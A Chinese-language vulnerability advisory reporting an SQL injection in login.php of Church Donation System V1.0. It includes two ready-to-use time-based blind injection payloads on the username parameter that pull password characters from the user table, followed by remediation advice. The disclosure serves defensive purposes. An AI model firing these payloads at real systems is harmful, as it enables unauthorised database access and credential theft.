关键漏洞信息 受影响产品 Church Donation System 漏洞文件 login.php 版本 V1.0 漏洞类型 SQL Injection 根因 在 文件中,参数 未经过适当的清理或验证直接用于 SQL 查询,导致攻击者可以通过该参数注入恶意代码。 影响 利用此 SQL 注入漏洞,攻击者可以未经授权访问数据库,窃取敏感数据,篡改数据,甚至中断服务,对系统安全和业务连续性构成严重威胁。 描述 在对 "Church Donation System" 进行安全评估时,发现了一个关键的 SQL 注入漏洞。该漏洞是由于对 参数的用户输入缺乏适当验证造成的。这使得攻击者能够通过构造恶意 SQL 查询来操纵数据库,从而在没有适当授权的情况下访问、修改或删除数据,并获取敏感信息。 漏洞细节和 PoC 漏洞位置: 参数 Payload: - 参数: username (POST) - 类型: 基于错误的盲注 - TITLE: MySQL >= 5.0 AND/OR 时间延迟(通用)(错误基于) - Payload: username=1' OR IF(ASCII(SUBSTRING((SELECT/%23/password FROM /%23/user LIMIT 0,1),1,1))>126,SLEEP(5),0)%23&password=123456&submit=Login - Type: Time-based blind - Title: MySQL >= 5.0.17 AND time-based blind (query SLEEP) - Payload: username=1' AND IF(ASCII(SUBSTRING((SELECT/%23/password FROM /%23/user LIMIT 0,1),1,1))>126,SLEEP(5),0)%23&password=123456&submit=Login 建议修复措施 1. 使用预编译语句和参数绑定。 2. 执行输入验证和过滤。 3. 最小化数据库用户权限。 ``` 这些信息提供了关于漏洞的具体细节,包括受影响的产品、版本、漏洞类型、根因、影响以及如何利用该漏洞的详细步骤和建议的修复措施。